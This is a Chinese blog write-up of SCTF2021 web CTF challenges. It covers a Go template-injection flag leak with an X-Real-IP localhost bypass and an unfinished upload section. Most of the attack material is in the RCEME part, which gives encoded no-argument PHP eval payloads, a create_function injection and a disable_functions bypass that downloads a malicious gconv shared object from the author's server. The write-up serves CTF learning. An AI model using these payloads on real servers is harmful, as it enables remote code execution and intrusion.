[CTF]SCTF2021 WEB复现(详细版)

最新推荐文章于 2022-07-29 03:27:27 发布
最新推荐文章于 2022-07-29 03:27:27 发布
阅读量4.2k 收藏 1
点赞数 3
分类专栏: CTF 文章标签: 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/122194853
版权

前言

认真复现还是收获挺多的,做这些就算看wp也会卡很久的题目才容易提高.最后感谢下NSSCTF平台提供的靶机,虽然flag只有一半

Loginme

下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码:

package middleware

import (
	"github.com/gin-gonic/gin"
)

func LocalRequired() gin.HandlerFunc {
	return func(c *gin.Context) {
		if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != "" {
			c.AbortWithStatus(403)
			return
		}
		ip := c.ClientIP()
		if ip == "127.0.0.1" {
			c.Next()
		} else {
			c.AbortWithStatus(401)
		}
	}
}

x-forwarded-for和x-client-ip都不能用,这里试了几个,可以用X-Real-IP绕过
然后在看

package structs

type UserInfo struct {
	Id       int
	Username string
	Age      string
	Password string
}

var Users = []UserInfo{
	{
		Id:       1,
		Username: "Grandpa Lu",
		Age:      "22",
		Password: "hack you!",
	},
	{
		Id:       2,
		Username: "Longlone",
		Age:      "??",
		Password: "i don't know",
	},
	{
		Id:       3,
		Username: "Teacher Ma",
		Age:      "20",
		Password: "guess",
	},
}

var Admin = UserInfo{
	Id:       0,
	Username: "Admin",
	Age:      "",
	Password: "flag{}",
}

从这里能看到Admin的Password就是flag
再看route.php下

TargetUser := structs.Admin
	for _, user := range structs.Users {
		if user.Id == id {
			TargetUser = user
		}
	}

	age := TargetUser.Age
	if age == "" {
		age, flag = c.GetQuery("age")
		if !flag {
			age = "forever 18 (Tell me the age)"
		}
	}

	if err != nil {
		c.AbortWithError(500, err)
	}

	html := fmt.Sprintf(templates.AdminIndexTemplateHtml, age)

因为没学过go,分析也就仔细些,先是TargetUser := structs.Admin,这里偷一段话:结构体是Go中一个非常重要的类型,Go通过结构体来类比一个对象,因此他的字段就是一个对象的属性。通常Json的编码和解析都需要通过结构体来实现,加之模板渲染支持传入一个结构体的实例来渲染它的字段,这就造成了信息泄漏的可能。所以再看到下面的age,我们可以通过模板注入把admin的password注出来,go中是通过{{.xxx}}来取值。比如

package main

import "fmt"
import "html/template"
import "os"

func main() {

        type person struct {
                Id      int
                Name    string
                Country string
        }

        sss := person{Id: 0, Name: "sapphire", Country: "China"}

        fmt.Println("sss = ", sss)

        tmpl := template.New("tmpl1")
        tmpl.Parse("Hello {{.Name}} Welcome to go programming...\n")
        tmpl.Execute(os.Stdout, sss)

}

输出为

sss={0 sapphire China} 
Hello sss Welcome to go programming...

所以payload:id=0&age={{.Password}}

Upload_it 1

index.php

if (!empty($_FILES['file'])) {
    $file = $_FILES['file'];
    if ($file['size'] < 1024 * 1024) {
        if (!empty($_POST['path'])) {
            $upload_file_path = $_SESSION["upload_path"]."/".$_POST['path'];
            $upload_file = $upload_file_path."/".$file['name'];
        } else {
            $upload_file_path = $_SESSION["upload_path"];
            $upload_file = $_SESSION["upload_path"]."/".$file['name'];
        }

        if (move_uploaded_file($file['tmp_name'], $upload_file)) {
            echo "OK! Your file saved in: " . $upload_file;
        } else {
            echo "emm...Upload failed:(";
        }
    } else {
        echo "too big!!!";
    }

if (!empty($_POST['path'])) {
            $upload_file_path = $_SESSION["upload_path"]."/".$_POST['path'];
            $upload_file = $upload_file_path."/".$file['name'];
        } else {
            $upload_file_path = $_SESSION["upload_path"];
            $upload_file = $_SESSION["upload_path"]."/".$file['name'];
        }

这里可以触发tostring方法,然后就要找链子

RCEME

<?php
if(isset($_POST['cmd'])){
    $code = $_POST['cmd'];
    if(preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
        die('<script>alert(\'Try harder!\');history.back()</script>');
    }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
        @eval($code);
        die();
    }
} else {
    highlight_file(__FILE__);
    var_dump(ini_get("disable_functions"));
}
?>

无参RCE,并且过滤了非常多函数,最后筛选下来只有这些

strlen
error_reporting
set_error_handler
create_function
preg_match
preg_replace
phpinfo
strstr
escapeshellarg
getenv
putenv
call_user_func
unserialize
var_dump
highlight_file
show_source
ini_get
end
apache_setenv
getallheaders

先用firebasky师傅的脚本生成payload

# -*- coding: utf-8 -*
# /usr/bin/python3
# @Author:Firebasky
exp = ""
def urlbm(s):
    ss = ""
    for each in s:
        ss += "%" + str(hex(255 - ord(each)))[2:]
    return f"[~{ss}][!%FF]("
while True:
    fun = input("Firebasky>: ").strip(")").split("(")
    exp = ''
    for each in fun[:-1]:
        exp += urlbm(each)
        print(exp)
    exp += ")" * (len(fun) - 1) + ";"
    print(exp)
    #call_user_func(...unserialize(end(getallheaders())));

生成得到

[~%9c%9e%93%93%a0%8a%8c%9a%8d%a0%99%8a%91%9c][!%FF]([~%d1%d1%d1%8a%91%8c%9a%8d%96%9e%93%96%85%9a][!%FF]([~%9a%91%9b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]())));

无法传参,用可变参数列表绕过,采用官方文档的描述

<?php
function sum(...$numbers) {
    $acc = 0;
    foreach ($numbers as $n) {
        $acc += $n;
    }
    return $acc;
}

echo sum(1, 2, 3, 4);
?>
//将会打印出10

所以把%d1%d1%d1删掉,在外面加上...,即

[~%9c%8d%9a%9e%8b%9a%a0%99%8a%91%9c%8b%96%90%91][!%FF](...[~%8a%91%8c%9a%8d%96%9e%93%96%85%9a][!%FF]([~%9a%91%9b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]())));

总体逻辑就是:通过call_user_func()来调用creat_function,call_user_func()会把第一个参数作为回调函数使用,具体原理参考官方文档所以要利用就必须使用上面所说的可变参数列表来调用creat_function,不过这个思路较为复杂,其实直接用create_function就可以了,因为create_function存在命令注入,具体参考这篇文章
我这里用的是create_funtion,现在构造一下序列化的内容:

<?php
$arr=['','}eval($_POST["a"]);//'];
$str=serialize($arr);
echo $str;

得到

a:2:{i:0;s:0:"";i:1;s:21:"}eval($_POST["a"]);//";}

然后
在这里插入图片描述
那么现在能确定命令可以执行,就可以开始绕disable_functions了。
尝试直接写so文件,500错误不知道为啥,那就通过vps来写.具体如下:
先在kali下创建一个payload.c,具体内容如下:

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  puts("pwned");
  system("bash -c '/readflag > /tmp/sapp'");
  exit(0);
}

其实就是执行命令把读到的flag放到/tmp下的sapp文件中。
然后

gcc payload.c -o payload.so -shared -fPIC

生成payload.so文件,把它放到自己的服务器上,再创建一个gconv-modules文件内容如下,也放到服务器上

module  PAYLOAD//    INTERNAL    ../../../../../../../../tmp/payload    2
module  INTERNAL    PAYLOAD//    ../../../../../../../../tmp/payload    2

开启http服务:python -m http.server 5000,然后就是发包了,先用原生类把两个文件写进tmp下

cmd=[~%9c%8d%9a%9e%8b%9a%a0%99%8a%91%9c%8b%96%90%91][!%FF](...[~%8a%91%8c%9a%8d%96%9e%93%96%85%9a][!%FF]([~%9a%91%9b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]())));&a=$url="http://xx.xx.85.60:5000/payload.so";$file1=new SplFileObject($url,'r');$a="";while(!$file1->eof()){$a=$a.$file1->fgets();}$file2 = new SplFileObject('/tmp/payload.so','w');$file2->fwrite($a);

cmd=[~%9c%8d%9a%9e%8b%9a%a0%99%8a%91%9c%8b%96%90%91][!%FF](...[~%8a%91%8c%9a%8d%96%9e%93%96%85%9a][!%FF]([~%9a%91%9b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]())));&a=$url = "http://xx.xx.85.60:5000/gconv-modules";$file1 = new SplFileObject($url,'r');$a="";while(!$file1->eof()){$a=$a.$file1->fgets();}$file2 = new SplFileObject('/tmp/gconv-modules','w');$file2->fwrite($a);

写好之后伪协议触发:

cmd=[~%9c%8d%9a%9e%8b%9a%a0%99%8a%91%9c%8b%96%90%91][!%FF](...[~%8a%91%8c%9a%8d%96%9e%93%96%85%9a][!%FF]([~%9a%91%9b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]())));&a=putenv("GCONV_PATH=/tmp/");show_source("php://filter/read=convert.iconv.payload.utf-8/resource=/tmp/payload.so");

然后就可以读取了
在这里插入图片描述

坑点

这个是问了guoke师傅了解的,本地测试取end(getallheaders())的时候是上面第一个是end,靶机的话是下面第一个是end取的位置,比如
本地:
在这里插入图片描述
开的容器:
在这里插入图片描述

Sapphire037
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SCTF2021_Pwn_dataleak_WP
weixin_56434818的博客
12-27 620
SCTF2021_dataleak_WP 文章目录SCTF2021_dataleak_WP检查文件和保护ida查看ELF文件cJSON_PWNida查看libcjson.so利用思路exploit 检查文件和保护 64位小端序,动态链接。relro半开,没开canary,开了PIE和NX。 ida查看ELF文件cJSON_PWN int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int i; //
2021SCTF
unexpectedthing的博客
03-31 852
前言 复现环境:NSSCTF Loginme 考点 GO的模板注入 wp middleware.go package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") !=
SCTF 2021 | 冰天雪地 极限比拼
Cyberpeace的博客
12-13 3091
​​今年圣诞怎么过?! SCTF 2021 喊你来解锁圣诞限定赛事啦!!! 由操刀四届赛题的Syclover战队精心打造 48小时超长赛道容纳无限可能 妙趣横生的圣诞特供赛题限时出没 圣诞盲盒隐姓埋名等待发掘 IoT和区块链题目惊喜现身 静候技艺高强的师傅大展拳脚 圣诞氛围感和解题爽感一应俱全✨ 过硬质量和多元趣味相得益彰 这个圣诞节 SCTF 2021 约你乘上特制雪橇 冲破漫天风雪 环游极客世界! 2021年12月25日9:00-27日9:00 SCTF 2021 冰天雪地 极限比拼 世界上大概是没有
SCTF2021__rceme
Sk1y的博客
03-28 1117
rceme 文章目录rceme先说下几个函数call_user_funcgetallheaders()可变参数绕过命令注入使用动态链接库so绕过disable_functions开启http服务(可选)利用php原生类进行文件读取参考链接 题目 <?php if(isset($_POST['cmd'])){ $code = $_POST['cmd']; if(preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|-|\+|=|\/|\\|<|>|\$|\
[SCTF2021 misc] this_is_A_tree
weixin_52640415的博客
12-27 434
一般不参加两天的比赛,因为太难了。不过也有容易的,这个就是 名字说这是个树,打开文件是一个文件两个目录,目录下也是同样的结构,就是一个二叉树。 然后用程序遍历了一下,因为最右有base64尾标记==所以肯定不是后根,猜先根。一下就成功了 import os from pwn import * data = b'' #先根遍历 def getdata(d): global data tmp = open(d+'/data','rb').read() #print(tmp,
CTF工具之WEB.zip
10-07
该工具包中含有17年永久火狐浏览器,抓包工具,SQL注入工具,webshell,网站后台扫描工具,代码审计系统等
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF 在这篇文章中,我们将探讨国科大web安全中期CTF的相关知识点。 一、Web安全基础知识 在开始之前,让我们先了解一些基本概念。Web安全是指保护Web应用程序免受恶意攻击和未经授权的访问的...
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF工具之御剑后台扫描(web).rar
09-16
此工具用于学习交流用途,切勿用于其它用途。
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
uploadit:上传Bot(链接到文件)
05-18
用于电报的简单URL上载器bot-基于MadelineProto,您可以使用以下两种方法: 与Heroku一起部署 1-)部署并运行http://{yourappname}.herokuapp.com/fileassistantbot.php 2-)写出您的应用程序ID /哈希和Bot令牌。 3-)启用Dynos。 使用VPS 1-)运行`git clone 2-运行php fileassistantbot.php VPS的安装要求 sudo apt-get install python-software-properties software-properties-common sudo LC_ALL=C.UTF-8 add-apt-repository ppa:ondrej/php sudo apt-get update sudo apt-get install ph
SCTF2021misc——This_is_A_tree
CNS-Enterprise BCC-1701-J
12-27 2656
下载附件得到压缩包,又是文件和文件夹嵌套 名为data的未知格式文件可以读出来 再结合文件夹名字,可以推测,整个压缩包内文件是一个非常明确的树结构 为防止出错,按照前序遍历进行遍历,将每一结点的data读出来,按树形结构放好 遍历完发现像是base64加密文本 Q2hpbmVzZSB0cmFkaXRpb25hbCBjdWx0dXJlIGlzIGJyb2FkIGFuZCBwcm9mb3VuZCEgU28gSSBXYW50IEdpdmUgWW91IE15IEZsYWcgQnV0IFlvdSBOZWVkI
sctf2021 data leak 出题思路和题解
令则
01-19 2230
sctf2021 data leak 出题思路和题解
SCTF2021__loginme
Sk1y的博客
03-11 859
SCTF2021__loginme 文章目录SCTF2021__loginme查看请求头模板渲染参考链接 赛后复现 docker创建容器,打开 提示我们需要localhost,但是我们使用XFF不可以,同时题目也给了附件,是go语言的,不是很会,这两天学了一下,来看下这个题目,复现下 题目给的附件: 打开看了main.go,这个源码是缺了一部分的,但是不影响做题(题目附件中缺了templates,赛后出题人将所有的源码放在了github,复现题目没问题) 之前没碰过go,边学边做吧 本题目用了一个gin
CTF赛题下载、复现、解题方法
renxq097的博客
04-07 3588
CTF赛题下载、复现、解题方法 看过这篇文章,你将学会自己搭建大佬们在github中分享的赛题进行复现 我们以靶场其中的(web_gift)进行复现 一、操作系统准备 你需要一个linux操作系统并完成docker搭建。 系统:ubuntu 安装网上教程一大堆,这里推荐一个: https://www.cnblogs.com/liujiaxin2018/p/14207930.html 二、ubuntu搭建docker环境 网上搭建docker一堆坑,对新手很不友好,建议看官网的最新命令 更
[SCTF2021 pwn] checkin
weixin_52640415的博客
12-27 1016
看上去说登录,以为是最简单的一题后来越作越想放弃,不过其它的也不会,用了半天的时间写了个程序,虽然不可能是预期的。但也算有结果。 先是给了个端口,然后就没有了。登上去提示爆4位sha256,这点没啥难度,由于有用的在后也所以肯定得写个小爆破程序,然后会返回base64编码的程序: from pwn import * import hashlib from base64 import b64decode import os context(arch='amd64') #nc 123.60.82.85
SCTF2021 pwn Christmas Bash 出题思路+预期解
令则
01-19 2126
SCTF2021 pwn Christmas Bash 出题思路+预期解
[SCTF2021]Upload_it_1复现闭包组件反序列化rce
Huamang的博客
02-11 3354
题目地址 SycloverTeam提供了题目的docker环境 https://github.com/SycloverTeam/SCTF2021/tree/master/web/Upload_it_1 wp 首先题目给了composer.json { "name": "sctf2021/upload", "authors": [ { "name": "AFKL", "email": "upload@qq.com"
BUUCTF[*CTF2019]otaku解题过程复现(超详细
weixin_67057449的博客
07-29 653
在学习过程中看了好几个人的解题过程,复现还是复现了好久,自己来写一篇详细一点的。
ctf 菜鸟杯 web签到
最新发布
09-12
CTF菜鸟杯的Web签到题目中,参与者需要通过某种方式获取flag。根据引用[2]的内容,有人成功获取了flag,flag的值是ctfshow{f187f7ae-fffe-4631-b2e1-29dad7adc5be}。值得一提的是,根据引用和引用的描述,这些Web题目对于一些新手来说可能比较具有挑战性,需要不断积累知识和向经验丰富的大师傅们学习。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值